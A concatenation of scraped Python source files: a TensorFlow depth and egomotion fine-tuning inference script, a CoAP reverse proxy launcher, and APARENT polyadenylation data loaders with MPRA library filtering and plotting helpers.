flags.DEFINE_bool('compute_minimum_loss', True, 'Whether to take the '
'element-wise minimum of the reconstruction/SSIM error in '
'order to avoid overly penalizing dis-occlusion effects.')
flags.DEFINE_bool('use_skip', True, 'Whether to use skip connections in the '
'encoder-decoder architecture.')
flags.DEFINE_bool('joint_encoder', False, 'Whether to share parameters '
'between the depth and egomotion networks by using a joint '
'encoder architecture. The egomotion network is then '
'operating only on the hidden representation provided by the '
'joint encoder.')
flags.DEFINE_float('egomotion_threshold', 0.01, 'Minimum egomotion magnitude '
'to apply finetuning. If lower, just forwards the ordinary '
'prediction.')
flags.DEFINE_integer('num_steps', 20, 'Number of optimization steps to run.')
flags.DEFINE_boolean('handle_motion', True, 'Whether the checkpoint was '
'trained with motion handling.')
flags.DEFINE_bool('flip', False, 'Whether images should be flipped as well as '
'resulting predictions (for test-time augmentation). This '
'currently applies to the depth network only.')
FLAGS = flags.FLAGS
flags.mark_flag_as_required('output_dir')
flags.mark_flag_as_required('data_dir')
flags.mark_flag_as_required('model_ckpt')
flags.mark_flag_as_required('triplet_list_file')
def main(_):
"""Runs fine-tuning and inference.
There are three categories of images.
1) Images where we have previous and next frame, and that are not filtered
out by the heuristic. For them, we will use the fine-tuned predictions.
2) Images where we have previous and next frame, but that were filtered out
by our heuristic. For them, we will use the ordinary prediction instead.
3) Images where we have at least one missing adjacent frame. For them, we will
use the ordinary prediction as indicated by triplet_list_file_remains (if
provided). They will also not be part of the generated inference list in
the first place.
Raises:
ValueError: Invalid parameters have been passed.
"""
if FLAGS.handle_motion and FLAGS.joint_encoder:
raise ValueError('Using a joint encoder is currently not supported when '
'modeling object motion.')
if FLAGS.handle_motion and FLAGS.seq_length != 3:
raise ValueError('The current motion model implementation only supports '
'using a sequence length of three.')
if FLAGS.handle_motion and not FLAGS.compute_minimum_loss:
raise ValueError('Computing the minimum photometric loss is required when '
'enabling object motion handling.')
if FLAGS.size_constraint_weight > 0 and not FLAGS.handle_motion:
raise ValueError('To enforce object size constraints, enable motion '
'handling.')
if FLAGS.icp_weight > 0.0:
raise ValueError('ICP is currently not supported.')
if FLAGS.compute_minimum_loss and FLAGS.seq_length % 2 != 1:
raise ValueError('Compute minimum loss requires using an odd number of '
'images in a sequence.')
if FLAGS.compute_minimum_loss and FLAGS.exhaustive_mode:
raise ValueError('Exhaustive mode has no effect when compute_minimum_loss '
'is enabled.')
if FLAGS.img_width % (2 ** 5) != 0 or FLAGS.img_height % (2 ** 5) != 0:
logging.warn('Image size is not divisible by 2^5. For the architecture '
'employed, this could cause artefacts caused by resizing in '
'lower dimensions.')
if FLAGS.output_dir.endswith('/'):
FLAGS.output_dir = FLAGS.output_dir[:-1]
# Create file lists to prepare fine-tuning, save it to unique_file.
unique_file_name = (str(datetime.datetime.now().date()) + '_' +
str(datetime.datetime.now().time()).replace(':', '_'))
unique_file = os.path.join(FLAGS.data_dir, unique_file_name + '.txt')
with gfile.FastGFile(FLAGS.triplet_list_file, 'r') as f:
files_to_process = f.readlines()
files_to_process = [line.rstrip() for line in files_to_process]
files_to_process = [line for line in files_to_process if len(line)]
logging.info('Creating unique file list %s with %s entries.', unique_file,
len(files_to_process))
with gfile.FastGFile(unique_file, 'w') as f_out:
fetches_network = FLAGS.num_steps * FLAGS.batch_size
fetches_saves = FLAGS.batch_size * int(np.floor(FLAGS.num_steps/SAVE_EVERY))
repetitions = fetches_network + 3 * fetches_saves
for i in range(len(files_to_process)):
for _ in range(repetitions):
f_out.write(files_to_process[i] + '\n')
# Read remaining files.
remaining = []
if gfile.Exists(FLAGS.triplet_list_file_remains):
with gfile.FastGFile(FLAGS.triplet_list_file_remains, 'r') as f:
remaining = f.readlines()
remaining = [line.rstrip() for line in remaining]
remaining = [line for line in remaining if len(line)]
logging.info('Running fine-tuning on %s files, %s files are remaining.',
len(files_to_process), len(remaining))
# Run fine-tuning process and save predictions in id-folders.
tf.set_random_seed(FIXED_SEED)
np.random.seed(FIXED_SEED)
random.seed(FIXED_SEED)
flipping_mode = reader.FLIP_ALWAYS if FLAGS.flip else reader.FLIP_NONE
train_model = model.Model(data_dir=FLAGS.data_dir,
file_extension=FLAGS.file_extension,
is_training=True,
learning_rate=FLAGS.learning_rate,
beta1=FLAGS.beta1,
reconstr_weight=FLAGS.reconstr_weight,
smooth_weight=FLAGS.smooth_weight,
ssim_weight=FLAGS.ssim_weight,
icp_weight=FLAGS.icp_weight,
batch_size=FLAGS.batch_size,
img_height=FLAGS.img_height,
img_width=FLAGS.img_width,
seq_length=FLAGS.seq_length,
architecture=FLAGS.architecture,
imagenet_norm=FLAGS.imagenet_norm,
weight_reg=FLAGS.weight_reg,
exhaustive_mode=FLAGS.exhaustive_mode,
random_scale_crop=FLAGS.random_scale_crop,
flipping_mode=flipping_mode,
random_color=False,
depth_upsampling=FLAGS.depth_upsampling,
depth_normalization=FLAGS.depth_normalization,
compute_minimum_loss=FLAGS.compute_minimum_loss,
use_skip=FLAGS.use_skip,
joint_encoder=FLAGS.joint_encoder,
build_sum=False,
shuffle=False,
input_file=unique_file_name,
handle_motion=FLAGS.handle_motion,
size_constraint_weight=FLAGS.size_constraint_weight,
train_global_scale_var=False)
failed_heuristic_ids = finetune_inference(train_model, FLAGS.model_ckpt,
FLAGS.output_dir + '_ft')
logging.info('Fine-tuning completed, %s files were filtered out by '
'heuristic.', len(failed_heuristic_ids))
for failed_id in failed_heuristic_ids:
failed_entry = files_to_process[failed_id]
remaining.append(failed_entry)
logging.info('In total, %s images were fine-tuned, while %s were not.',
len(files_to_process)-len(failed_heuristic_ids), len(remaining))
# Copy all results to have the same structural output as running ordinary
# inference.
for i in range(len(files_to_process)):
if files_to_process[i] not in remaining: # Use fine-tuned result.
elements = files_to_process[i].split(' ')
source_file = os.path.join(FLAGS.output_dir + '_ft', FLAGS.ft_name +
'id_' + str(i),
str(FLAGS.num_steps).zfill(10) +
('_flip' if FLAGS.flip else ''))
if len(elements) == 2: # No differing mapping defined.
target_dir = os.path.join(FLAGS.output_dir + '_ft', elements[0])
target_file = os.path.join(
target_dir, elements[1] + ('_flip' if FLAGS.flip else ''))
else: # Other mapping for file defined, copy to this location instead.
target_dir = os.path.join(
FLAGS.output_dir + '_ft', os.path.dirname(elements[2]))
target_file = os.path.join(
target_dir,
os.path.basename(elements[2]) + ('_flip' if FLAGS.flip else ''))
if not gfile.Exists(target_dir):
gfile.MakeDirs(target_dir)
logging.info('Copy refined result %s to %s.', source_file, target_file)
gfile.Copy(source_file + '.npy', target_file + '.npy', overwrite=True)
gfile.Copy(source_file + '.txt', target_file + '.txt', overwrite=True)
gfile.Copy(source_file + '.%s' % FLAGS.file_extension,
target_file + '.%s' % FLAGS.file_extension, overwrite=True)
for j in range(len(remaining)):
elements = remaining[j].split(' ')
if len(elements) == 2: # No differing mapping defined.
target_dir = os.path.join(FLAGS.output_dir + '_ft', elements[0])
target_file = os.path.join(
target_dir, elements[1] + ('_flip' if FLAGS.flip else ''))
else: # Other mapping for file defined, copy to this location instead.
target_dir = os.path.join(
FLAGS.output_dir + '_ft', os.path.dirname(elements[2]))
target_file = os.path.join(
target_dir,
os.path.basename(elements[2]) + ('_flip' if FLAGS.flip else ''))
if not gfile.Exists(target_dir):
gfile.MakeDirs(target_dir)
source_file = target_file.replace('_ft', '')
logging.info('Copy unrefined result %s to %s.', source_file, target_file)
gfile.Copy(source_file + '.npy', target_file + '.npy', overwrite=True)
gfile.Copy(source_file + '.%s' % FLAGS.file_extension,
target_file + '.%s' % FLAGS.file_extension, overwrite=True)
logging.info('Done, predictions saved in %s.', FLAGS.output_dir + '_ft')
def finetune_inference(train_model, model_ckpt, output_dir):
"""Train model."""
vars_to_restore = None
if model_ckpt is not None:
vars_to_restore = util.get_vars_to_save_and_restore(model_ckpt)
ckpt_path = model_ckpt
pretrain_restorer = tf.train.Saver(vars_to_restore)
sv = tf.train.Supervisor(logdir=None, save_summaries_secs=0, saver=None,
summary_op=None)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
img_nr = 0
failed_heuristic = []
with sv.managed_session(config=config) as sess:
# TODO(casser): Caching the weights would be better to avoid I/O bottleneck.
while True: # Loop terminates when all examples have been processed.
if model_ckpt is not None:
logging.info('Restored weights from %s', ckpt_path)
pretrain_restorer.restore(sess, ckpt_path)
logging.info('Running fine-tuning, image %s...', img_nr)
img_pred_folder = os.path.join(
output_dir, FLAGS.ft_name + 'id_' + str(img_nr))
if not gfile.Exists(img_pred_folder):
gfile.MakeDirs(img_pred_folder)
step = 1
# Run fine-tuning.
while step <= FLAGS.num_steps:
logging.info('Running step %s of %s.', step, FLAGS.num_steps)
fetches = {
'train': train_model.train_op,
'global_step': train_model.global_step,
'incr_global_step': train_model.incr_global_step
}
_ = sess.run(fetches)
if step % SAVE_EVERY == 0:
# Get latest prediction for middle frame, highest scale.
pred = train_model.depth[1][0].eval(session=sess)
if FLAGS.flip:
pred = np.flip(pred, axis=2)
input_img = train_model.image_stack.eval(session=sess)
input_img_prev = input_img[0, :, :, 0:3]
input_img_center = input_img[0, :, :, 3:6]
input_img_next = input_img[0, :, :, 6:]
img_pred_file = os.path.join(
img_pred_folder,
str(step).zfill(10) + ('_flip' if FLAGS.flip else '') + '.npy')
motion = np.squeeze(train_model.egomotion.eval(session=sess))
# motion of shape (seq_length - 1, 6).
motion = np.mean(motion, axis=0) # Average egomotion across frames.
if SAVE_PREVIEWS or step == FLAGS.num_steps:
# Also save preview of depth map.
color_map = util.normalize_depth_for_display(
np.squeeze(pred[0, :, :]))
visualization = np.concatenate(
(input_img_prev, input_img_center, input_img_next, color_map))
motion_s = [str(m) for m in motion]
s_rep = ','.join(motion_s)
with gfile.Open(img_pred_file.replace('.npy', '.txt'), 'w') as f:
f.write(s_rep)
util.save_image(
img_pred_file.replace('.npy', '.%s' % FLAGS.file_extension),
visualization, FLAGS.file_extension)
with gfile.Open(img_pred_file, 'wb') as f:
np.save(f, pred)
# Apply heuristic to not finetune if egomotion magnitude is too low.
ego_magnitude = np.linalg.norm(motion[:3], ord=2)
heuristic = ego_magnitude >= FLAGS.egomotion_threshold
if not heuristic and step == FLAGS.num_steps:
failed_heuristic.append(img_nr)
step += 1
img_nr += 1
return failed_heuristic
if __name__ == '__main__':
app.run(main)
```
#### File: tcn/utils/progress.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
class Progress(object):
"""A utility class for reporting processing progress."""
def __init__(self, target_size):
self.target_size = target_size
self.current_size = 0
self.start_time = datetime.datetime.now()
def Update(self, current_size):
"""Replaces internal current_size with current_size."""
self.current_size = current_size
def Add(self, size):
"""Increments internal current_size by size."""
self.current_size += size
def __str__(self):
processed = 1e-5 + self.current_size / float(self.target_size)
current_time = datetime.datetime.now()
elapsed = current_time - self.start_time
eta = datetime.timedelta(
seconds=elapsed.total_seconds() / processed - elapsed.total_seconds())
return "%d / %d (elapsed %s eta %s)" % (
self.current_size, self.target_size,
str(elapsed).split(".")[0],
str(eta).split(".")[0])
``` |
{
"source": "8749236/CoAPthon3",
"score": 3
} |
#### File: 8749236/CoAPthon3/coapreverseproxy.py
```python
import getopt
import sys
from coapthon.reverse_proxy.coap import CoAP
__author__ = '<NAME>'
class CoAPReverseProxy(CoAP):
def __init__(self, host, port, xml_file, multicast=False, cache=False, starting_mid=None):
CoAP.__init__(self, (host, port), xml_file=xml_file, multicast=multicast, starting_mid=starting_mid,
cache=cache)
print(("CoAP Proxy start on " + host + ":" + str(port)))
def usage(): # pragma: no cover
print("coapreverseproxy.py -i <ip address> -p <port> -f <xml_file>")
def main(argv): # pragma: no cover
ip = "0.0.0.0"
port = 5684
file_xml = "reverse_proxy_mapping.xml"
try:
opts, args = getopt.getopt(argv, "hi:p:f:", ["ip=", "port=", "file="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit()
elif opt in ("-i", "--ip"):
ip = arg
elif opt in ("-p", "--port"):
port = int(arg)
elif opt in ("-f", "--file"):
file_xml = arg
server = CoAPReverseProxy(ip, port, file_xml)
try:
server.listen(10)
except KeyboardInterrupt:
print("Server Shutdown")
server.close()
print("Exiting...")
if __name__ == "__main__": # pragma: no cover
main(sys.argv[1:])
``` |
{
"source": "876lkj/APARENT",
"score": 2
} |
#### File: aparent/data/aparent_data_native_pairs.py
```python
from __future__ import print_function
import keras
from keras import backend as K
import tensorflow as tf
import pandas as pd
import os
import pickle
import numpy as np
import scipy.sparse as sp
import scipy.io as spio
import isolearn.io as isoio
import isolearn.keras as iso
def load_data(batch_size=32, valid_set_size=0.0, test_set_size=1.0, file_path='') :
#Load leslie/apadb pair-wise data
native_dict = isoio.load(file_path + 'apa_leslie_apadb_pair_data')
native_df = native_dict['df_pair']
native_index = np.arange(len(native_df), dtype=np.int)
print('Pair-wise Native APA (APADB + Leslie) size = ' + str(native_index.shape[0]))
native_train_index = native_index[:-int(len(native_df) * (valid_set_size + test_set_size))]
native_valid_index = native_index[native_train_index.shape[0]:-int(len(native_df) * test_set_size)]
native_test_index = native_index[native_train_index.shape[0] + native_valid_index.shape[0]:]
print('Training set size = ' + str(native_train_index.shape[0]))
print('Validation set size = ' + str(native_valid_index.shape[0]))
print('Test set size = ' + str(native_test_index.shape[0]))
#Calculate relative APADB cut start and end positions within each sequence
def get_start_pos_prox(row) :
if row['strand'] == '+' :
return row['cut_start_prox'] - row['pas_pos_prox'] + 70
else :
return row['pas_pos_prox'] - row['cut_end_prox'] + 76
def get_end_pos_prox(row) :
if row['strand'] == '+' :
return row['cut_end_prox'] - row['pas_pos_prox'] + 70
else :
return row['pas_pos_prox'] - row['cut_start_prox'] + 76
def get_start_pos_dist(row) :
if row['strand'] == '+' :
return row['cut_start_dist'] - row['pas_pos_dist'] + 70
else :
return row['pas_pos_dist'] - row['cut_end_dist'] + 76
def get_end_pos_dist(row) :
if row['strand'] == '+' :
return row['cut_end_dist'] - row['pas_pos_dist'] + 70
else :
return row['pas_pos_dist'] - row['cut_start_dist'] + 76
native_df['rel_start_prox'] = native_df.apply(get_start_pos_prox, axis=1)
native_df['rel_end_prox'] = native_df.apply(get_end_pos_prox, axis=1)
native_df['rel_start_dist'] = native_df.apply(get_start_pos_dist, axis=1)
native_df['rel_end_dist'] = native_df.apply(get_end_pos_dist, axis=1)
native_gens = {
gen_id : iso.DataGenerator(
idx,
{'df' : native_df},
batch_size=batch_size,
inputs = [
{
'id' : 'seq_prox',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : iso.SequenceExtractor('wide_seq_ext_prox', start_pos=105, end_pos=105 + 205),
'encoder' : iso.OneHotEncoder(seq_length=205),
'dim' : (205, 4, 1),
'sparsify' : False
},
{
'id' : 'seq_dist',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : iso.SequenceExtractor('wide_seq_ext_dist', start_pos=105, end_pos=105 + 205),
'encoder' : iso.OneHotEncoder(seq_length=205),
'dim' : (205, 4, 1),
'sparsify' : False
},
{
'id' : 'start_prox',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: row['rel_start_prox'],
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'end_prox',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: row['rel_end_prox'],
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'start_dist',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: row['rel_start_dist'],
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'end_dist',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: row['rel_end_dist'],
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'site_distance',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: np.log(np.abs(row['cut_start_dist'] - row['cut_start_prox'])),
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'lib',
'source_type' : 'dataframe',
'source' : 'df',
'extractor' : lambda row, index: np.zeros(13),
'encoder' : None,
'sparsify' : False
},
{
'id' : 'distal_pas',
'source_type' : 'dataframe',
'source' : 'df',
'extractor' : lambda row, index: 1,
'encoder' : None,
'sparsify' : False
}
],
outputs = [
{
'id' : 'dummy_output',
'source_type' : 'zeros',
'dim' : (1,),
'sparsify' : False
}
],
randomizers = [],
shuffle = False
) for gen_id, idx in [('all', native_index), ('train', native_train_index), ('valid', native_valid_index), ('test', native_test_index)]
}
return native_gens
```
#### File: APARENT/data/prepare_aparent_data_helpers.py
```python
import pandas as pd
import numpy as np
import scipy.sparse as sp
#Random MPRA sorting and shuffling functions
class LibraryPreparer :
def __init__(self, preparer_type_id) :
self.preparer_type_id = preparer_type_id
def _prepare(self, library_dict) :
raise NotImplementedError()
class LibraryCountFilter(LibraryPreparer) :
def __init__(self, minimum_count) :
super(LibraryCountFilter, self).__init__('lib_count_filter')
self.minimum_count = minimum_count
def _prepare(self, library_dict) :
keep_index = np.nonzero(library_dict['data']['total_count'] >= self.minimum_count)[0]
new_library_dict = { 'metadata' : library_dict['metadata'] }
new_library_dict['data'] = library_dict['data'].iloc[keep_index].reset_index(drop=True)
new_library_dict['cuts'] = library_dict['cuts'][keep_index]
return new_library_dict
def __call__(self, library_dict) :
return self._prepare(library_dict)
class SubLibraryCountFilter(LibraryPreparer) :
def __init__(self, min_count_dict) :
super(SubLibraryCountFilter, self).__init__('sublib_count_filter')
self.min_count_dict = min_count_dict
def _prepare(self, library_dict) :
keep_index = []
i = 0
for _, row in library_dict['data'].iterrows() :
if i % 100000 == 0 :
print("Filtering sequence " + str(i))
if row['library_index'] not in self.min_count_dict :
keep_index.append(i)
elif row['total_count'] >= self.min_count_dict[row['library_index']] :
keep_index.append(i)
i += 1
new_library_dict = { 'metadata' : library_dict['metadata'] }
new_library_dict['data'] = library_dict['data'].iloc[keep_index].reset_index(drop=True)
new_library_dict['cuts'] = library_dict['cuts'][keep_index]
return new_library_dict
def __call__(self, library_dict) :
return self._prepare(library_dict)
class LibrarySelector(LibraryPreparer) :
def __init__(self, included_libs) :
super(LibrarySelector, self).__init__('lib_selector')
self.included_libs = included_libs
def _prepare(self, library_dict) :
keep_index = np.nonzero(library_dict['data']['library_index'].isin(self.included_libs))[0]
new_library_dict = { 'metadata' : library_dict['metadata'] }
new_library_dict['data'] = library_dict['data'].iloc[keep_index].reset_index(drop=True)
new_library_dict['cuts'] = library_dict['cuts'][keep_index]
return new_library_dict
def __call__(self, library_dict) :
return self._prepare(library_dict)
class LibraryBalancer(LibraryPreparer) :
def __init__(self, included_libs) :
super(LibraryBalancer, self).__init__('lib_balancer')
self.included_libs = included_libs
def _prepare(self, library_dict) :
L_included = self.included_libs
arranged_index_len = 0
arranged_index_len = int(np.sum([len(np.nonzero(library_dict['data']['library_index'] == lib)[0]) for lib in L_included]))
min_join_len = int(np.min([len(np.nonzero(library_dict['data']['library_index'] == lib)[0]) for lib in L_included]))
arranged_index = np.zeros(arranged_index_len, dtype=np.int)
arranged_remainder_index = 0
arranged_join_index = arranged_index_len - len(L_included) * min_join_len
for lib_i in range(0, len(L_included)) :
lib = L_included[lib_i]
print('Arranging lib ' + str(lib))
#1. Get indexes of each Library
lib_index = np.nonzero(library_dict['data']['library_index'] == lib)[0]
#2. Sort indexes of each library by count
lib_count = library_dict['data'].iloc[lib_index]['total_count']
sort_index_lib = np.argsort(lib_count)
lib_index = lib_index[sort_index_lib]
#3. Shuffle indexes of each library modulo 2
even_index_lib = np.nonzero(np.arange(len(lib_index)) % 2 == 0)[0]
odd_index_lib = np.nonzero(np.arange(len(lib_index)) % 2 == 1)[0]
lib_index_even = lib_index[even_index_lib]
lib_index_odd = lib_index[odd_index_lib]
lib_index = np.concatenate([lib_index_even, lib_index_odd])
#4. Join modulo 2
i = 0
for j in range(len(lib_index) - min_join_len, len(lib_index)) :
arranged_index[arranged_join_index + i * len(L_included) + lib_i] = lib_index[j]
i += 1
#5. Append remainder
for j in range(0, len(lib_index) - min_join_len) :
arranged_index[arranged_remainder_index] = lib_index[j]
arranged_remainder_index += 1
new_library_dict = { 'metadata' : library_dict['metadata'] }
new_library_dict['data'] = library_dict['data'].iloc[arranged_index].reset_index(drop=True)
new_library_dict['cuts'] = library_dict['cuts'][arranged_index]
#Perform final read count control check between dataframe and cut matrix
total_count_from_cuts = np.ravel(new_library_dict['cuts'].sum(axis=1)) + np.ravel(new_library_dict['data']['distal_count'].values)
if not np.all(total_count_from_cuts == np.array(new_library_dict['data']['total_count'].values)) :
print('Error! Count mismatch between dataframe and cut matrix.')
return new_library_dict
def __call__(self, library_dict) :
return self._prepare(library_dict)
def plot_cumulative_library_proportion(library_dict, percentile_step=0.05, figsize=(12, 8), n_xticks=10, n_yticks=10) :
library_fractions_from_top = np.linspace(0, 1, num=int(1. / percentile_step) + 1)[1:]
libs = library_dict['data']['library'].unique()
cum_fraction = np.zeros((len(library_fractions_from_top), len(libs)))
total_lib_size = float(len(library_dict['data']))
frac_i = 0
for library_fraction in library_fractions_from_top :
lib_i = 0
for lib in libs :
lib_slice = library_dict['data'].iloc[-int(library_fraction * total_lib_size):]
lib_size = len(np.nonzero((lib_slice['library'] == lib))[0])
curr_frac = float(lib_size) / float(len(lib_slice))
cum_fraction[frac_i, lib_i] = curr_frac
lib_i += 1
frac_i += 1
fig = plt.subplots(figsize=figsize)
plt.stackplot(library_fractions_from_top, np.fliplr(cum_fraction.T), labels=libs)
plt.legend(loc='upper left', fontsize=12)
plt.xticks(np.linspace(0, 1, num=n_xticks + 1)[:-1], np.round(np.linspace(0, 1, num=n_xticks + 1), 2)[:-1], fontsize=14, rotation=45)
plt.yticks(np.linspace(0, 1, num=n_yticks + 1), np.round(np.linspace(0, 1, num=n_yticks + 1), 2), fontsize=14)
plt.xlim(np.min(library_fractions_from_top), np.max(library_fractions_from_top))
plt.ylim(0, 1)
plt.xlabel('Percentile of data (low to high read count)', fontsize=14)
plt.ylabel('Library proportion of Percentile to 100%', fontsize=14)
plt.title('Cumulative library proportion', fontsize=16)
plt.tight_layout()
plt.show()
def plot_library_cut_profile(library_dict, figsize=(12, 8)) :
f = plt.figure(figsize=figsize)
libs = library_dict['data']['library'].unique()
ls = []
for lib in libs :
lib_index = np.nonzero((library_dict['data']['library'] == lib))[0]
proximal_profile = np.ravel(library_dict['cuts'][lib_index].sum(axis=0))
proximal_profile /= np.sum(proximal_profile)
la, = plt.plot(np.arange(len(proximal_profile)), proximal_profile, linewidth=2, label=lib)
ls.append(la)
#Proximal 1
plt.axvline(x=70, linewidth=2, c='black', linestyle='--')
plt.axvline(x=70 + 6, linewidth=2, c='black', linestyle='--')
plt.axvline(x=70 + 21, linewidth=2, c='orange', linestyle='--')
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
plt.xlabel('Position', fontsize=14)
plt.ylabel('Read count', fontsize=14)
plt.title('Proximal site', fontsize=16)
plt.tight_layout()
plt.legend(handles = ls, fontsize=12)
plt.show()
def plot_individual_library_count_distribution(library_dict, figsize=(12, 8), n_xticks=10, y_max=500) :
total_count = np.ravel(library_dict['data']['total_count'].values)
libs = library_dict['data']['library'].unique()
fig = plt.figure(figsize=figsize)
ls = []
for lib in libs :
lib_index = np.nonzero(library_dict['data']['library'] == lib)[0]
lib_slice = library_dict['data'].iloc[lib_index]
lib_count = np.ravel(lib_slice['total_count'].values)
lib_frac = np.arange(len(lib_slice)) / float(len(lib_slice))
lt, = plt.plot(lib_frac, lib_count, linewidth=2, label=lib)
ls.append(lt)
plt.legend(handles=ls, loc='upper left', fontsize=12)
plt.xticks(np.round(np.linspace(0, 1, num=n_xticks + 1), 2), np.round(np.linspace(0, 1, num=n_xticks + 1), 2), fontsize=14, rotation=45)
plt.yticks(fontsize=14)
plt.xlim(0, 1)
plt.ylim(0, y_max)
plt.xlabel('Percentile of data', fontsize=14)
plt.ylabel('Read count', fontsize=14)
plt.title('Individual library count distribution', fontsize=16)
plt.tight_layout()
plt.show()
def plot_combined_library_count_distribution(library_dict, figsize=(12, 8), n_xticks=10, x_min=0, x_max=1, y_max=500) :
total_count = np.ravel(library_dict['data']['total_count'].values)
total_lib_frac = np.arange(total_count.shape[0]) / float(total_count.shape[0])
libs = library_dict['data']['library'].unique()
fig = plt.figure(figsize=figsize)
ls = []
for lib in libs :
lib_index = np.nonzero(library_dict['data']['library'] == lib)[0]
lib_slice = library_dict['data'].iloc[lib_index]
lib_count = np.ravel(lib_slice['total_count'].values)
lib_frac = total_lib_frac[lib_index]
lt, = plt.plot(lib_frac, lib_count, linewidth=2, label=lib)
ls.append(lt)
plt.legend(handles=ls, loc='upper left', fontsize=12)
plt.xticks(np.round(np.linspace(0, 1, num=n_xticks + 1), 2), np.round(np.linspace(0, 1, num=n_xticks + 1), 2), fontsize=14, rotation=45)
plt.yticks(fontsize=14)
plt.xlim(x_min, x_max)
plt.ylim(0, y_max)
plt.xlabel('Percentile of data', fontsize=14)
plt.ylabel('Read count', fontsize=14)
plt.title('Combined library count distribution', fontsize=16)
plt.tight_layout()
plt.show()
#Designed MPRA aggregate functions
def group_dataframe(df, cuts, cut_start=None, min_total_count=1, drop_nans=False, nan_prox_range=[57, 87], misprime_filters=None, groupby_list=['master_seq']) :
print('Collapsing with groupby = ' + str(groupby_list))
df_copy = df.copy().reset_index(drop=True)
cuts_dense = np.array(cuts.todense())
if cut_start is not None :
cuts_dense = np.array(cuts.todense())[:, cut_start:]
cuts_dense = np.hstack([cuts_dense, np.ravel(df_copy['distal_count'].values).reshape(-1, 1)])
df_copy['cuts'] = cuts_dense.tolist()
print('Filtering...')
print('Size before filtering = ' + str(len(df_copy)))
df_copy['prox_ratio_temp'] = np.sum(cuts_dense[:, nan_prox_range[0]:nan_prox_range[1]], axis=1) / np.sum(cuts_dense, axis=1)
if drop_nans :
df_copy = df_copy.query("total_count >= " + str(min_total_count) + " and prox_ratio_temp > 0.0 and prox_ratio_temp < 1.0").reset_index(drop=True)
else :
df_copy = df_copy.query("total_count >= " + str(min_total_count)).reset_index(drop=True)
if misprime_filters is not None :
misprime_query = ""
experiment_i = 0
for experiment in misprime_filters :
if experiment != 'all' :
misprime_query += "not (experiment == '" + experiment + "' and ("
else :
misprime_query += "not ("
for filter_i, filter_id in enumerate(misprime_filters[experiment]) :
misprime_query += filter_id + " == True"
if filter_i < len(misprime_filters[experiment]) - 1 :
misprime_query += " or "
else :
misprime_query += ")"
if experiment_i < len(misprime_filters) - 1 :
misprime_query += ") and "
else :
misprime_query += ")"
experiment_i += 1
df_copy = df_copy.query(misprime_query).reset_index(drop=True)
print('Size after filtering = ' + str(len(df_copy)))
df_group = df_copy.groupby(groupby_list)
list_f = lambda x: tuple(x)
agg_dict = {
'experiment' : 'first',
'subexperiment' : 'first',
'gene' : 'first',
'significance' : 'first',
'clinvar_id' : 'first',
'variant' : 'first',
'in_acmg' : 'first',
'sitetype' : 'first',
'wt_seq' : 'first',
'predicted_logodds' : 'first',
'predicted_usage' : 'first',
'barcode' : list_f,
'proximal_count' : list_f,
'distal_count' : list_f,
'total_count' : list_f,
'cuts' : lambda x: tuple([np.array(l) for l in x])#tuple(x.tolist())
}
if 'master_seq' not in groupby_list :
agg_dict['master_seq'] = 'first'
df_agg = df_group.agg(agg_dict)
print('Grouped dataframe.')
return df_agg
def summarize_dataframe(df, min_barcodes=1, min_pooled_count=1, min_mean_count=1, prox_cut_start=55, prox_cut_end=85, isoform_pseudo_count=0, pooled_isoform_pseudo_count=0, cut_pseudo_count=0, drop_nans=False) :
print('Filtering...')
df['n_barcodes'] = df['barcode'].apply(lambda t: len(t))
df['pooled_total_count'] = df['total_count'].apply(lambda t: np.sum(np.array(list(t))))
df['mean_total_count'] = df['total_count'].apply(lambda t: np.mean(np.array(list(t))))
df = df.query("n_barcodes >= " + str(min_barcodes) + " and pooled_total_count >= " + str(min_pooled_count) + " and mean_total_count >= " + str(min_mean_count)).copy()
print('Summarizing...')
df['pooled_cuts'] = df['cuts'].apply(lambda t: np.sum(np.array(list(t)), axis=0))
df['mean_cuts'] = df['cuts'].apply(lambda t: np.mean(np.vstack([ x for x in list(t) ]), axis=0))
df['pooled_cut_prob'] = df['cuts'].apply(lambda t: np.sum(np.array(list(t)), axis=0) / np.sum(np.array(list(t))))
df['mean_cut_prob'] = df['cuts'].apply( lambda t: np.mean(np.vstack([ x / np.sum(x) for x in list(t) ]), axis=0) )
df['proximal_count'] = df['cuts'].apply(lambda t: tuple([np.sum(x[prox_cut_start: prox_cut_end]) for x in t]))
proximal_distrib = df['cuts'].apply(lambda t: tuple([(x[prox_cut_start: prox_cut_end] + cut_pseudo_count) / np.sum(x[prox_cut_start: prox_cut_end] + cut_pseudo_count) for x in t]))
df['proximal_avgcut'] = proximal_distrib.apply(lambda t: tuple([np.sum(x * (np.arange(prox_cut_end - prox_cut_start))) for x in t]))
df['pooled_proximal_count'] = df['proximal_count'].apply(lambda t: np.sum(np.array(list(t))))
df['pooled_distal_count'] = df['distal_count'].apply(lambda t: np.sum(np.array(list(t))))
df['proximal_usage'] = df.apply(lambda row: tuple([(p + isoform_pseudo_count) / (t + 2. * isoform_pseudo_count) for p, t in zip(list(row['proximal_count']), list(row['total_count']))]), axis=1)
df['proximal_logodds'] = df['proximal_usage'].apply(lambda t: tuple([np.log(p / (1. - p)) for p in list(t)]))
df['pooled_proximal_usage'] = (df['pooled_proximal_count'] + pooled_isoform_pseudo_count) / (df['pooled_total_count'] + 2. * pooled_isoform_pseudo_count)
df['mean_proximal_usage'] = df['proximal_usage'].apply(lambda t: np.mean(list(t)))
df['median_proximal_usage'] = df['proximal_usage'].apply(lambda t: np.median(list(t)))
df['std_proximal_usage'] = df['proximal_usage'].apply(lambda t: np.std(list(t)))
